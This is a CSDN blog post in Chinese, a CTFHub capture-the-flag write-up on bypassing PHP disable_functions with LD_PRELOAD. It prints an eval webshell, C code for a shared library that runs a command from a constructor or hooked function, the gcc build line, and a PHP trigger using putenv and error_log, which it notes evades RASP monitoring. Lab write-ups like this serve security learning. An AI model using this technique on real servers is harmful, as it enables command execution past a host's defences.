“CTFHub LD_PRELOAD“wp(详解)

于 2024-03-01 21:12:43 发布
阅读量975 收藏 18
点赞数 24
文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73195494/article/details/136404889
版权 
< ? php
	@eval($_REQUEST['ant']);
    show_source(__FILE__);
? >

打开界面发现如图所示的代码,显然可以通过蚁剑进行连接,连接成功

在目录下找到flag文件,但flag打开为空,于是打开终端,发现对于发出的命令均返回ret=127,说明是disable_functions(禁用函数)生效,查看phpinfo,发现禁用了许多函数。 

接下来有两种方法:

手动配置

在LD_PRELOAD问题中,mail() 、 error_log()、ImageMagick() 是常用于劫持的触发函数,原因是在运行的时候能够启动子进程,这样才能重新加载我们所设置的环境变量,从而劫持子进程所调用的库函数。

在这个题目中,disable_function发现mail()函数被禁用,error_log()函数未被禁用,所以采用error_log函数,error_log函数在运行时,会调用getegid() 函数。那么我们可以通过重写 getegid() 函数编译为so文件来进行攻击(选择getegid函数是因为该函数没有参数,可以减少工作量,减少复杂性)

#include<stdlib.h>
#include <stdio.h>        
#include<string.h> 

void payload() {
	system("/readflag > /tmp/feng.txt");//执行访问feng.txt命令
}

int geteuid() {
	if (getenv("LD_PRELOAD") == NULL)
	{
		return 0;
	}
	unsetenv("LD_PRELOAD");//通过LD_PRELOAD劫持了启动进程的相关函数,如果劫持后启动的新进程同样调用该函数,那么如果不在新进程启动前取消LD_PRELOAD,则将陷入死循环。通常做法调用 unsetenv("LD_PRELOAD")删除环境变量。
	payload();
}

优化版(上述代码存在一些问题,有些函数服务器不支持,如mail函数实际依赖的是sendmail,但是目标服务器未安装。使用__attribute__ ((constructor))构造函数的动态库文件,该函数会在main()之前执行,因此无需劫持某个函数即可执行代码。) 

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
__attribute__((__constructor__)) void xxx(void) {
    unsetenv("LD_PRELOAD");
    system("/readflag > /tmp/flag");
}

 将文件命名为hack.c,然后利用下述命令生成hack.so(需要在linux下执行)

gcc -shared -fPIC hack.c -o hack.so

将hack.so文件上传到/tmp/目录下,一般来说/tmp/目录都有读写权限

 然后编写feng.php,在feng.php中利用error_log函数链接hack.so,将feng.php上传到/var/www/html。(在利用过程中,通过设置LD_PRELOAD环境变量引入自定义的so库。由于真正的恶意代码运行在php之外的进程,自然避过了RASP监控。)

<?php
putenv("LD_PRELOAD=/tmp/hack.so");//利用putenv函数来实现链接库的设置,putenv函数用来设置环境变量,且环境变量仅存活于当前请求期间。 在请求结束时环境会恢复到初始状态。(注意这里的目录要有访问权限)
error_log("",1,"","");
?>

然后在网页中访问feng.php文件,刷新目录,在/tmp目录中得到feng.txt文件,打开得到flag

蚁剑工具

如下图,利用蚁剑插件

 加载成功后,在目录中会增加两个文件

 

此时利用蚁剑重新连接.php文件

连接成功后发现终端可以执行命令了,得到flag

参考文章:CTFHub Bypass disable_function系列(已完结)_ctfhubbypass disable_function-CSDN博客

RASP攻防 —— RASP安全应用与局限性浅析 - 博客 - 腾讯安全应急响应中心 (tencent.com)

bypass php disable_functions | ssooking's notebook


 

the_universe_
关注
  • 24
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
openredir:通过 LD_PRELOAD 重定向文件打开操作
05-31
打开目录 通过 LD_PRELOAD 重定向文件打开操作
PRELOAD:LD_PRELOAD rootkit实用程序
05-23
LD PRELOAD实用程序
针对校园某服务器的一次渗透测试
zhangge3663的博客
01-31 2499
发现学校其中一台服务器可能(绝对)存在漏洞。我想(绝对)能拿下它; 而且渗透测试的过程很有趣,便将其记录下来。 0x00 前期交互及信息收集 由于是对内网直接进行大扫描,所以直接判断这不仅是一个Web服务器(多个),同时还运行着FTP、数据库。 在此,再次使用nmap扫描一次,结果如下: $ sudo nmap -T4 -n -sS -sV -O 192.168.3.72Nmap scan report for 192.168.3.72Host is up (0.00076s late..
CTFHub-bypass disable_function
a21536545645的博客
07-10 800
一,LD_PRELOAD 前置知识: putenv:php函数,可以设置环境变量 mail(),error_log(): php的函数,会调用系统的sendmail函数发送邮件 LD_PRELOAD:linux环境变量,作用是他设置的.so会在程序本身的.so之前执行。 题目情况 存在一个shell,用蚂直接连接。进入虚拟终端执行命令发现ret=127,说明不能执行系统命令 /?ant=phpinfo();看到禁用了很多函数 但是没有禁用putenv,error_log,email这几个函数 思路 创建
一道CTF题ezinclude引出的新姿势
sash1mi
12-11 3263
[NPUCTF2020]ezinclude 0x01 初探题目 查看页面源码 fuzz一波 出来一个dir.php 看看dir.php,关于数组的东西 先留着 说不定下面有用 抓包看看index.php有甚么 一个Hash还是蛮醒目的 结合刚才的页面信息username&password 尝试去拼接url /?name=1&pass=576322dd496b99d07b5b0f7fa7934a25(所给的Hash) 拿到一个flflflflag.php 访问 跳转到了404.h
Webshell之流量分析
qq_51323560的博客
05-15 2185
--------------------------------------------------------------------------------------------------------------------------------第一次学习webshell流量分析,还请大佬们多多指教。参数1,str参数是指将要进行截取字符操作的字符串。参数3, length参数是说明本次截取操作的长度,(2)分析发现真正有效的字符串是去除头部的2个字母。(3)查看虚拟终端执行的命令。
ATT&CK靶场系列(三)
qq_1873822的博客
11-29 2980
vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 拓扑结构大体如下: 百度网盘: https://pan.baidu.com/s/1iy4MIy6ni6d9F3iypeCYVQ 密码: 【红日安全】您的下载密码为:7mhi。 环境配置 打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。 挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取
free_checker:使用LD_PRELOAD的简单内存泄漏查找程序(用于C程序)
05-06
免费检查器用法./freeChecker.sh描述######使用LD_PRELOAD的简单免费检查程序(用于C程序)。 ######它有助于程序员发现内存泄漏错误!
go-ldpreload-backdoor:使用Go进行LD_PRELOAD libc挂钩
02-05
使用Go LD_PRELOAD libc挂钩 这是在共享库中使用Go封装libc函数并启动TCP服务器(&ldquo;后门”)的实验,该服务器允许从客户端(如telnet或netcat)运行任意命令。 这是一款用于教育目的的玩具,可演示Go的某些功能。 ...
srv-shim:通过LD_PRELOAD getaddrinfoconnect挂钩对旧系统的SRV记录支持
05-15
LD_PRELOAD=target/debug/libsrvshim.so \ curl _my-service._tcp.domain 您还可以在/etc/ld.so.conf创建一个条目,以使它被加载到系统上的所有进程中。 OSX: DYLD_INSERT_LIBRARIES=/abs/path/to/libsrvshim....
高效Web前端开发之路
11-30
本书共分三篇13章,第一篇作为全书的开篇,简要介绍了Web开发的各种理论基础,包括HTML、CSS以及JavaScript等。还将通过翔实的理论介绍面向对象的程序设计思路与Web开发之间的关系。第二篇作为本书内容的核心,介绍了YUI的相关基础知识,以及操作文档节点、处理增强事件、操作样式表等使用YUI开发时不可或缺的理论,并通过大量案例帮助用户了解和使用YUI,提高Web开发的效率。第三篇介绍了YUI的实用功能。
ctfhub web全部做题记录(持续跟新)
01-08
信息泄露 目录历遍 直接找就行。。。 PHPINFO 进去直接 ctrl+f 搜flag就行。。。 备份文件下载 网站源码 提示一些相关的名字 可以写个简单的脚本爆破一下 当然也可以 dirsearch 直接扫 import requests url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
CTF第十四天
qq_52680097的博客
08-28 884
CTF第十四天 太久没写了,今天挑战下题目 LD_PRELOAD 太久没整了,我都忘了PHP是啥,再复习一遍。 PHP是一种能在服务器端执行的脚本语言,也可嵌入到HTML中 看到这个提示,先来了解下Linux LD_PRELOAD环境变量 这里有关于动态链接库的详解和Linux LD_PRELOAD环境变量简介 动态链接库详解【一】 linux 环境变量LD_PRELOAD简介 定义优先加载的动态链接库 了解了这些,大概就能知道这题的原理了 原理:php部分函数在执行的时候会加载动态库里面的函数,而LD_
记一次渗透进学弟服务器Getshell的过程
落日领航员の技术栈
09-06 1631
0x00 写在前面 首先说一句,我真的好久 好久 好久 好久 好久没碰过渗透了,一方面是因为太菜,之前从来都没完整的走完一套getshell,半路卡住是常有,做着做着就give up;另一方面是从实习以来一直做的是安全开发相关的工作,以后工作方向大概率也是安全开发而不是攻防。 那为什么我会忽然想起搞学弟的网站呢?事情是这样的,之前有指导过学弟怎么搭建一套作业提交系统,然后学弟就开始自己研究,中间过了好久,我也忘了这码事。 今天晚上他忽然来找我 顺便问他要了网址,也想登上去看看是啥样 本来以为就是个简单的作
CTFHUB-web_前置技能_http协议wp
Alexhirchi的博客
03-20 1249
1.请求方法 提示:HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 进入页面显示 它的意思就是,当前http的请求方式是get请求,当你使用CTFHUB为请求方式时,你将获得flag(HTTP Method 是可以自定义的,并且区分大小写) 思路 (1)burp抓包,修改HTTP Method为CTFHUB,发包,返回flag信息 (2)用cu...
CTFHub WP LD_PRELOAD
m0_62879498的博客
04-08 1314
CTFHub WP LD_PRELOAD 在做渗透测试中,有时候会遇到无法执行 shell命令的情况,有可能是php函数 disable_function禁用了危险函数,如dl exec system passthure等等(eval并非PHP函数,需要PHP扩展 Suhosin对其进行禁用) disable_function 是php.ini中的一个设置选项,用来禁用php中的某些函数,通常是危险函数。 如果了解过linux动态加载的话,我们就会明白还有一种无法执行 shell命令的情况,那就
ctfhub技能树部分wp(潦草笔记)
m0_53268118的博客
04-28 429
ctfhub部分wp
ctf web方向与php学习记录30之shellshock初见()
这周末在做梦的博客
12-03 617
本次分享的内容有关shellshock。一,知识学习1 unix shell、bash、POSIX、API的学习笔记2 shellshock及相关漏洞总结一,历史二,介绍三,相关漏洞二,例题ctfhub shellshock wp 一,知识学习 1 unix shell、bash、POSIX、API的学习笔记 2 shellshock及相关漏洞总结 一,历史 一个名为Shellshock的安全漏洞在2014年9月初被发现,并迅速导致互联网上的一系列攻击。这个漏洞可追溯到1989年发布的1.03版本。 二,
BUUCTF寒假刷题-Web
热门推荐
Braindance
02-28 6万+
寒假横向刷题(尽量) BUUCTF 2021.01.15 [HCTF 2018]WarmUp 进到靶机一个硕大的滑稽,查看源码有提示source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","h.
LD_PRELOAD
最新发布
09-01
LD_PRELOAD是一个环境变量,用于在运行时强制加载指定的共享库文件。它的作用是在程序启动前加载指定的库文件,从而重定向或替换程序中的函数调用。通常使用unsetenv("LD_PRELOAD")来删除LD_PRELOAD环境变量,以避免...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值